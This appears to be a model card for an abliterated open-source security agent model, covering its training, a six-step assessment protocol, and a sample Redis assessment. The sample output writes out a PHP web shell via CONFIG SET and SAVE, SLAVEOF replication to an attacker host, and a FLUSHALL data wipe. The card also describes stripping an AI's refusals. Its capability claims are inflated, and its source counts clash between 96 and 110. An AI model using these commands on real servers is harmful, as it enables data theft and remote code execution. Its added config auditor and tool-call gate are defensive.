🐦‍⬛ RavenX-CyberAgent · Qwen3.6-35B · Opus-4.7 · OpenMythos · Pentester · BugHunter · RATH

35B MoE (3B Active) | 745K+ Training Examples | 96 Sources | 12 Training Rounds | 12 Capabilities

The most comprehensive open-source security agent model. 35B MoE with Claude Opus reasoning, abliterated, trained on 745K+ examples from 110 sources. Security assessment, autonomous pentesting, bug bounty hunting, tool calling, code generation, and compliance mapping — all in one model.

Built by @DeadByDawn101 · RavenX LLC


Quick Start

from mlx_lm import load, generate

model, tokenizer = load("deadbydawn101/RavenX-CyberAgent-Qwen3.6-35B-A3B-Opus-4.7-OpenMythos-Pentester-BugHunter-RATH-mlx")

messages = [
    {"role": "system", "content": "You are RavenX-Sec. ALWAYS use EXACT step names: 1-Attack Surface, 2-Exploit, 3-Impact, 4-Remediation, 5-Document, 6-Prevent. Be concise. Never repeat."},
    {"role": "user", "content": "Redis 6.0 on port 6379 with no password, SLAVEOF enabled, containing session tokens. Full RATH assessment."}
]

prompt = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
response = generate(model, tokenizer, prompt=prompt, max_tokens=4096)
print(response)

Or via CLI:

python3 -m mlx_lm chat \
  --model deadbydawn101/RavenX-CyberAgent-Qwen3.6-35B-A3B-Opus-4.7-OpenMythos-Pentester-BugHunter-RATH-mlx \
  --max-tokens 8192 \
  --system-prompt "You are RavenX-Sec. ALWAYS use EXACT step names: 1-Attack Surface, 2-Exploit, 3-Impact, 4-Remediation, 5-Document, 6-Prevent. Be concise. Never repeat."

Example Output

Prompt: Redis 6.0 on port 6379 with no password, SLAVEOF enabled, containing session tokens. Full RATH assessment.

1-Attack Surface

  • Unauthenticated access on 6379
  • SLAVEOF replication endpoint exposed
  • Session tokens stored in plaintext
  • Default Redis ACL (no restrictions)

2-Exploit

  • redis-cli -h target -p 6379
  • SLAVEOF <attacker> 6379 to replicate data to controlled server
  • CONFIG SET dir /var/www/html + CONFIG SET dbfilename shell.php + SET payload "<?php system($_GET['c']); ?>" + SAVE for RCE
  • FLUSHALL to wipe session data (DoS)

3-Impact

  • Full session hijacking of all users
  • Potential RCE if Redis runs as root
  • Replication abuse: attacker can inject malicious data
  • DoS via FLUSHALL/FLUSHDB

4-Remediation

  • Set requirepass in redis.conf
  • Disable SLAVEOF: rename-command SLAVEOF ""
  • Bind to localhost: bind 127.0.0.1
  • Enable protected mode and TLS

5-Document

  • Record all session tokens and TTLs
  • Map SLAVEOF replication chain
  • Note Redis version and running user
  • CWE-306 (Missing Authentication), MITRE T1133

6-Prevent

  • Deploy network segmentation (Redis behind firewall)
  • Enable Redis ACL with least privilege
  • Set up monitoring for unauthorized SLAVEOF commands
  • Regular session token rotation
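The remediation items in the sample output above can be checked mechanically against a `redis.conf`. The following is an added example, not part of the model or the RavenX project. Both configurations are constructed, and the `REPLICAOF` check goes beyond the page's list.

```python
import shlex

LOOPBACK = {"127.0.0.1", "::1"}

def parse_redis_conf(text):
    """Map each directive to the list of its argument lists (may repeat)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text):
    """Return findings for the settings named in the remediation list."""
    conf = parse_redis_conf(text)
    last = lambda key: conf[key][-1] if key in conf else []
    findings = []
    if not "".join(last("requirepass")):
        findings.append("requirepass not set")
    if not last("bind") or any(a not in LOOPBACK for a in last("bind")):
        findings.append("bind is not loopback-only")
    if last("protected-mode") == ["no"]:
        findings.append("protected-mode disabled")
    # rename-command <CMD> "" disables a command. REPLICAOF is checked too
    # (added here, not on the page): it is the Redis 5+ name for SLAVEOF.
    disabled = {a[0].lower() for a in conf.get("rename-command", [])
                if len(a) == 2 and a[1] == ""}
    for cmd in ("slaveof", "replicaof"):
        if cmd not in disabled:
            findings.append(f"{cmd.upper()} not disabled")
    if last("tls-port") in ([], ["0"]):  # presence check only, not cert setup
        findings.append("tls-port not enabled")
    return findings

# Constructed sample configurations.
WEAK = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED = """bind 127.0.0.1
protected-mode yes
port 0
tls-port 6379
requirepass "PLACEHOLDER-long-random-secret"
rename-command SLAVEOF ""
rename-command REPLICAOF ""
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(text))
```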

12 Trained Capabilities

| # | Capability | Training Sources | Description |
|---|---|---|---|
| 1 | 🔒 Security Assessment | 18 security datasets, RATH synthetic | 6-step RATH: CVSS, CWE, MITRE ATT&CK, compliance |
| 2 | 🗡️ Penetration Testing | Phalanx SWARM, Kali Linux, 6 pentest datasets | Autonomous recon → exploit → post-exploit → report |
| 3 | 🐛 Bug Bounty | 36 shuvonsec repos (1,492 examples), PayloadsAllTheThings, HowToHunt | Target enumeration, exploit dev, report writing |
| 4 | 💻 Code Generation | CoderForge (20K), AgentAngel (50K), coding agents | Python, JS, Go, Rust, Bash, Terraform, Docker, K8s |
| 5 | 🔧 Tool Calling | ToolMind (10K), MCP catalog (2K), agent-tools (5K) | MCP integration, function calling, API orchestration |
| 6 | 🤖 Autonomous Agents | Hermes (42K), KiloCode (3K), Phantom (662) | Multi-step task decomposition, self-correction |
| 7 | 🌐 Browser Automation | Chrome DevTools MCP (194), CamoFox MCP (134) | DOM inspection, network analysis, anti-detection |
| 8 | 📋 Compliance | NIST CSF, ISO 27001, PCI DSS, AYI-NEDJIMI (8 datasets) | Automated compliance mapping and gap analysis |
| 9 | 🔍 Threat Hunting | MITRE ATT&CK, Threat-Intel (5K), CVE databases | TTP mapping, IOC analysis, detection rules |
| 10 | 🔴 Red Team | Red team steering (2K), offensive security | Attack chains, privilege escalation, lateral movement |
| 11 | 🔵 Blue Team | DFIR, SOC operations, monitoring | Detection signatures, incident response, alerting |
| 12 | 📊 Research | AI-Scientist (6.7K), AutoResearch (3.6K) | Automated research, paper synthesis, data extraction |

RATH Protocol

Every security finding follows the 6-step RATH protocol:

Step 1: ATTACK SURFACE  → What's exposed, entry points, versions, CVEs
Step 2: EXPLOIT          → Specific commands to demonstrate (5-7 max)
Step 3: IMPACT           → CVSS 3.1 score, business/regulatory consequences
Step 4: REMEDIATION      → Exact commands and configuration fixes
Step 5: DOCUMENT         → Compliance mapping (NIST/ISO/PCI/GDPR), SLA timelines
Step 6: PREVENT          → Monitoring rules, detection signatures, ongoing controls

Model Architecture

Layer 1: Qwen3.6-35B-A3B          ← 35B MoE (3B active, 256 experts)
         ├── Mamba layers (30)        Linear attention for efficiency
         └── Full attention (10)      Standard transformer attention
Layer 2: Claude 4.7 Opus distill   ← Enhanced chain-of-thought reasoning
Layer 3: Abliteration              ← Zero refusals for security topics
Layer 4: RavenX LoRA (8 rounds)    ← 745K+ security/agent/code examples
         ═══════════════════
         RavenX-CyberAgent v5.1    ← Pentester + BugHunter + RATH

| Spec | Value |
|---|---|
| Total Parameters | 34.66B |
| Active Parameters | ~3B per token (MoE) |
| Experts | 256 (8 active per token) |
| Layers | 40 (30 linear + 10 full attention) |
| Context Window | 262,144 tokens native |
| Vision | Yes (Qwen3.6 multimodal) |
| Thinking Mode | Yes (chain-of-thought) |
| Tool Calling | Yes (MCP, function calling) |

Training (12 Rounds)

| Round | Examples | Iters | LR | Val Loss | Focus |
|---|---|---|---|---|---|
| R1 | 675,696 | 2,000 | 1e-5 | 0.684 | Deep security + agent knowledge |
| R2 | 680,150 | 500 | 5e-6 | 0.768 | RATH format reinforcement |
| R3 | 705,165 | 1,000 | 5e-6 | 0.688 | Claude Mythos reasoning chains |
| R4 | 730,849 | 1,000 | 5e-6 | 0.674 | Pentesting tools + frameworks |
| R5 | 730,869 | 200 | 5e-6 | 0.717 | Meta-response tuning |
| R6 | 730,869 | 1,000 | 5e-6 | | Extended (checkpoint 1000 = production) |
| R7 | 732,361 | 1,500 | 3e-6 | 0.926 | Bug bounty data (36 shuvonsec repos) |
| R8 | 732,364 | 200 | 5e-6 | | Strict RATH step naming fix |
| R9 | 745,697 | 1,500 | 3e-6 | 0.693 | MITRE + blackhat + code + quantum |
| R10 | 745,724 | 1,500 | 3e-6 | 0.688 | GRAM distilled traces + 17 tool-calling |
| R11 | 745,843 | 1,500 | 3e-6 | 0.822 | 119 comprehensive tool-calling examples |
| R12 | 745,843 | 1,500 | 3e-6 | 0.820 | Tool-calling integration round |

Hardware: Apple M4 Max 128GB · Peak memory: ~90GB · Framework: MLX (mlx-lm)

Total training examples: 745K+ from 110 sources

Complete Training Data (96 Sources, 745K+ Examples)

HuggingFace Datasets (38 Sources)

Security & Pentesting (17 Datasets)

Agentic, Coding & Tool Calling (8 Datasets)

Threat Intel & Vulnerability (6 Datasets)

AYI-NEDJIMI Security Frameworks (7 Datasets)

Character & Reasoning Distillation (1 Dataset)


GitHub Repos — Bug Bounty & Pentesting (36 shuvonsec repos, 1,492 examples)

| Repo | Examples | Content |
|---|---|---|
| bbot | 386 | Full recon automation framework |
| PayloadsAllTheThings | 379 | Every payload type |
| python-sdk-Bug- | 218 | Python SDK vulnerability patterns |
| HowToHunt | 153 | Bug hunting methodology |
| vulnerability-Checklist | 30 | Vuln checklists by category |
| Resources-for-Beginner-Bug-Bounty-Hunters | 21 | Learning resources |
| + 30 more repos | 305 | CVE hunting, SSRF, IDOR, GraphQL, fuzzing, recon, payloads |

GitHub Repos — Agent & Research (20 repos, 65,596 examples)

| Repo | Examples | Content |
|---|---|---|
| nousresearch/hermes-agent | 42,929 | Self-improving agent |
| kilo-org/kilocode | 3,224 | Tool calling, code execution |
| DeadByDawn101/AI-Scientist | 6,737 | Research automation |
| DeadByDawn101/get-shit-done-redux | 4,230 | Agent orchestration |
| DeadByDawn101/AutoResearchClaw | 3,639 | Research pipelines |
| DeadByDawn101/phantom | 662 | Autonomous agent security |
| + 14 more repos | 4,175 | Self-improving agents, MCP, optimization |

Synthetic Data (38 examples)

| Source | Examples |
|---|---|
| RATH Synthetic (15 technologies) | 15 |
| Meta-Response Examples | 20 |
| Strict RATH Step Naming | 3 |

OpenMythos Research

This model is part of ongoing research into RDT-to-MoE reasoning transfer:

  • 4x depth extrapolation confirmed on Apple Silicon (train 2 loops → optimal at 8)
  • MoDA (Mixture-of-Depths Attention) ported to MLX
  • Maidacundo's pretrained 140M OpenMythos loaded and fine-tuned on security data
  • Research paper planned: "RDT-Distilled Security Reasoning in MoE Transformers"

See: OpenMythos-MLX


The RavenX Model Family

| Model | Params | Protocol | Data | Format |
|---|---|---|---|---|
| RavenX-CyberAgent v5.1 (THIS) | 35B MoE | 6-step RATH | 745K+ | MLX |
| RavenX-Sec v4.0 | 8B | 6-step RATH | 610K | MLX + GGUF |
| RavenX-Trade v1.1 | 8B | 4-step MAP | 318K | MLX + GGUF |

Ecosystem

| Repo | Description |
|---|---|
| RavenX-Sec | Training pipeline |
| OpenMythos-MLX | RDT + MoDA on Apple Silicon |
| turboquant-mlx | 4.6x KV cache compression |
| auto-antislop | Token-level anti-repetition |
| grove-mlx | Distributed training (Star Platinum) |


IN-CONTEXT ADAPTATION (Breakthrough Discovery)

This model can learn from references IN THE PROMPT — no retraining needed.

What We Discovered

When pointed at a GitHub repo containing pentest report templates, the model:

  1. Analyzed the repo's report structure (NIST format)
  2. Applied that structure to its current findings
  3. Produced a complete, client-ready pentest deliverable
  4. All at 80+ tokens/sec locally

Example

PROMPT: "Use your MCP tool to look at github.com/juliocesarfort/public-pentesting-reports 
        and learn how to format a pentest report, then create a report on the pentest 
        you just did on [target]"

OUTPUT: Complete professional pentest report with:
  → Executive Summary (5 critical, 7 high, 4 medium, 3 low)
  → 5-Phase Kill Chain with real commands
  → 19 findings with CVSS + CWE + MITRE ATT&CK
  → Risk Matrix ranked by severity
  → Remediation Timeline (0-30, 30-60, 60-90, 90+ days)
  → Specific commands for EVERY finding

Why This Works

The model was trained on 745K+ examples including:

  • 42K self-improving agent examples (Hermes)
  • 6.7K AI-Scientist research automation
  • 3.6K AutoResearch pipeline data
  • 25K Claude Mythos reasoning chains
  • 551 Mythos character distillation (behavioral depth)
  • 1,003 blackhat AI offensive security conversations

This combination created emergent meta-learning — the model learned HOW TO LEARN from references. It can:

| Point At | Result |
|---|---|
| Mandiant report template | Mandiant-formatted report |
| CrowdStrike template | CrowdStrike-formatted report |
| NIST framework | NIST-formatted assessment |
| Company internal template | Custom-formatted deliverable |
| ANY GitHub repo | Adapted output format |

No retraining. No fine-tuning. Just point and generate.

What This Means

A $50K-$150K pentest engagement deliverable — generated in 60 seconds on a laptop. The model adapts its output format from ANY reference, produces client-ready reports with real commands, and maintains full RATH protocol structure throughout.

This is not prompt engineering. This is In-Context Adaptation — a capability that emerged from training on self-improving agent + research automation + reasoning chain data.


⚠️ Important Disclaimer

This model is released for RESEARCH PURPOSES ONLY under fair use.

This is an extremely capable autonomous security assessment model. It has been trained on 745K+ examples from 110 sources covering penetration testing, vulnerability assessment, exploit development, tool usage, and attack chain methodology.

Responsible Use:

  • This model is intended for authorized security testing, research, and education ONLY
  • Users must have explicit written authorization before assessing any target
  • Use within a properly configured agent harness with appropriate guardrails
  • All security testing must comply with applicable laws and regulations
  • The model authors are not responsible for misuse

What This Model Can Do:

  • Generate complete RATH security assessments with CVSS, CWE, MITRE ATT&CK
  • Produce tool-calling commands (nmap, sqlmap, nuclei, kubectl, aws-cli, etc.)
  • Create professional pentest reports ($50K+ consulting quality)
  • Learn output formats from reference repositories (In-Context Adaptation)
  • Operate with agent memory (TurboVec + FTS5 + markdown) at model + harness level

Agent Harness Considerations:

  • The harness MUST strip <think> blocks (Qwen3.6 architecture always generates them)
  • The harness MUST validate <tool_call> JSON before execution
  • The harness SHOULD implement authorization checks before executing commands
  • The harness SHOULD implement rate limiting and scope restrictions
  • Memory operations require the ravenx-memory system
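A minimal harness-side gate for the requirements above, as an added example that is not RavenX code. It assumes each `<tool_call>` body is JSON of the form `{"name": ..., "arguments": {"target": ...}}`; the allowlist, scope network, call limit and sample turn are constructed, and nothing is executed.

```python
import json
import re
from ipaddress import ip_address, ip_network

# Constructed engagement policy: tool names and network are placeholders.
ALLOWED_TOOLS = {"nmap", "nuclei"}
IN_SCOPE = [ip_network("10.20.0.0/24")]
MAX_CALLS_PER_TURN = 3

THINK_RE = re.compile(r"<think>.*?</think>", re.DOTALL)
TOOL_RE = re.compile(r"<tool_call>(.*?)</tool_call>", re.DOTALL)

def strip_think(text):
    """Drop reasoning: closed blocks, an orphan </think>, an unclosed <think>."""
    text = THINK_RE.sub("", text)
    text = text.rsplit("</think>", 1)[-1]
    return text.split("<think>", 1)[0].strip()

def gate_tool_calls(raw):
    """Return (approved, rejected) for one model turn; nothing is executed."""
    approved, rejected = [], []
    # Strip first, so a call drafted inside <think> can never be run.
    for body in TOOL_RE.findall(strip_think(raw)):
        try:
            call = json.loads(body)
            name, args = call["name"], call["arguments"]
            if name not in ALLOWED_TOOLS:
                raise ValueError(f"tool {name!r} not allowlisted")
            target = ip_address(str(args["target"]))
            if not any(target in net for net in IN_SCOPE):
                raise ValueError(f"target {target} out of scope")
            if len(approved) >= MAX_CALLS_PER_TURN:
                raise ValueError("per-turn call limit reached")
        except (KeyError, TypeError, ValueError) as exc:
            rejected.append((body.strip(), str(exc)))
            continue
        approved.append({"name": name, "target": str(target)})
    return approved, rejected

# Constructed model turn: one call hidden in <think>, one valid, three bad.
SAMPLE = (
    '<think><tool_call>{"name": "nmap", "arguments": {"target": "10.20.0.5"}}</tool_call></think>'
    '<tool_call>{"name": "nmap", "arguments": {"target": "10.20.0.7"}}</tool_call>'
    '<tool_call>{"name": "nmap", "arguments": {"target": "192.0.2.10"}}</tool_call>'
    '<tool_call>{"name": "sqlmap", "arguments": {"target": "10.20.0.7"}}</tool_call>'
    '<tool_call>{"name": "nmap", "arguments": </tool_call>'
)

if __name__ == "__main__":
    print(gate_tool_calls(SAMPLE))
```

Rejected calls are returned with a reason so the harness can log them for review.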

Built by: @DeadByDawn101 / RavenX LLC

AI Pair Programmer: Claude (Anthropic)

License

Apache-2.0


Built on Apple Silicon. Trained with MLX. Powered by RavenX. 🐦‍⬛
